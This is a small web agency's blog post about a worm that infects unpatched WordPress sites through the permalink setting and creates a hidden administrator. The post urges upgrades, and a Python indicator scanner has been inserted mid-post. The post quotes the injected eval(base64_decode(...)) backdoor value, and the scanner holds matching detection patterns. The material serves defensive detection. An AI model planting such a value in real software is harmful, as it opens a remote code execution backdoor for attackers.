Tuesday Tech: Take the time to upgrade!

Take a long holiday weekend, combine it with being home with a preschooler and infant twins all weekend with a husband off working, and you have a recipe for several days of I-don’t-have-time-to-read-my-tech-blogs.

Mix in an insidious worm making its rounds and infecting self-hosted WordPress installations, and you’ve got me, right now, steaming mad at spammers, whom I like to frequently refer to as the wastrels of the internet.

This morning at 5:30am, while scanning through some of my favorite tech blogs, I came across a post about this worm, and of course I started checking our clients’ blogs.

Yech, one client has been hacked. The blog is not, thankfully, ruined, but the process that has to be done in order to heal the blog is slightly arduous.

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, exploits a security bug (fixed earlier in the year) that lets attacker-supplied code be evaluated and executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at the Users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords to look for are “eval” and “base64_decode.”

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
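The two clues above (a permalink structure that evaluates decoded code, and an administrator account you did not create) can be checked without clicking through the dashboard. The following script is an added example and not part of the original post or of WordPress itself; it assumes you have pulled the `permalink_structure` option and the user list out of the database (or an export) into plain Python values. The sample data, including the login names, is constructed for the demonstration; only the permalink value is the one quoted in the post.

```python
"""Scan a WordPress permalink structure and user list for the indicators
described in the post: eval/base64_decode in the permalink, and
unexpected administrator accounts (e.g. "Administrator (2)")."""
import re
from urllib.parse import unquote

# Indicators named in the post, plus the superglobal the injected code reads.
PERMALINK_INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.IGNORECASE),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.IGNORECASE),
    "request superglobal": re.compile(r"\$_(SERVER|GET|POST|REQUEST|COOKIE)\b"),
}


def permalink_findings(permalink_structure):
    """Return the names of indicators present in a permalink structure.

    The value is URL-decoded first, because the injected code shows up
    percent-encoded (%7B, %5B, ...) when it is displayed in a URL."""
    decoded = unquote(permalink_structure)
    return [name for name, pat in PERMALINK_INDICATORS.items() if pat.search(decoded)]


def suspicious_users(users, known_admins):
    """Flag administrator accounts outside the operator's allowlist and any
    display name carrying a numbered suffix such as "Administrator (2)".

    `users` is a list of dicts with 'login', 'display_name' and 'role';
    `known_admins` is the set of logins the site owner actually created."""
    flagged = []
    for user in users:
        reasons = []
        if user["role"] == "administrator" and user["login"] not in known_admins:
            reasons.append("administrator not in allowlist")
        if re.search(r"\(\d+\)\s*$", user["display_name"]):
            reasons.append("display name ends with a numbered suffix")
        if reasons:
            flagged.append((user["login"], reasons))
    return flagged


# Constructed sample data. The permalink is the one quoted in the post;
# the user records and logins are hypothetical.
INFECTED_PERMALINK = (
    "/category/post-title/%&(%7B$%7Beval(base64_decode("
    "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/"
)
CLEAN_PERMALINK = "/%year%/%monthnum%/%postname%/"

SAMPLE_USERS = [
    {"login": "jane", "display_name": "Jane", "role": "administrator"},
    {"login": "editor1", "display_name": "Editor One", "role": "editor"},
    {"login": "administrator2", "display_name": "Administrator (2)", "role": "administrator"},
]
KNOWN_ADMINS = {"jane"}


def scan_site(permalink_structure, users, known_admins):
    """Combine both checks into one report; an empty report means no indicator hit."""
    report = {}
    hits = permalink_findings(permalink_structure)
    if hits:
        report["permalink"] = hits
    rogue = suspicious_users(users, known_admins)
    if rogue:
        report["users"] = rogue
    return report


if __name__ == "__main__":
    for label, permalink in (("infected", INFECTED_PERMALINK), ("clean", CLEAN_PERMALINK)):
        print(label, scan_site(permalink, SAMPLE_USERS, KNOWN_ADMINS))
```

The user check deliberately keys on the role rather than on the display name alone, since the post notes the rogue account hides itself from the Users page with JavaScript; reading the user table directly sidesteps that trick.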

I have clients who opt to hold off on a WordPress upgrade because maybe they are hesitant about having to learn how to navigate around a new backend interface, or maybe they are concerned about the time it will take to upgrade (note: the newer versions of WordPress have a great automatic upgrade feature built in, so upgrades shouldn’t take any longer than 5-10 minutes, depending on whether you have to adjust any of your plugins for the upgrade). The ever-popular Lorelle On WordPress says it best: “This attack is serious enough to overcome all your fears of updating.” And as far as the cost of having your web team do your upgrade (if you don’t know how to do it yourself)? Far less expensive and much less of a hassle than having to have your web team clean up after an attack.

Now, if you will excuse me, I’m off to do a whole slew of upgrades, and hopefully no more clean-ups!

· · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · ·

6 thoughts on “Tuesday Tech: Take the time to upgrade!”

The aftermath: we had one site affected (all cleaned up now), and all but one site is upgraded (client asked me to wait a few days). Phew! The nice thing about the current versions of WP is that they’ve made upgrades super easy to do, so all our future upgrades will now be cake!

Thanks on the congrats… hard to believe they are almost five and a half months already. My big sis is indeed happy, but THEIR big brother (my four and a half year old) is still over-the-moon. SO thankful for that!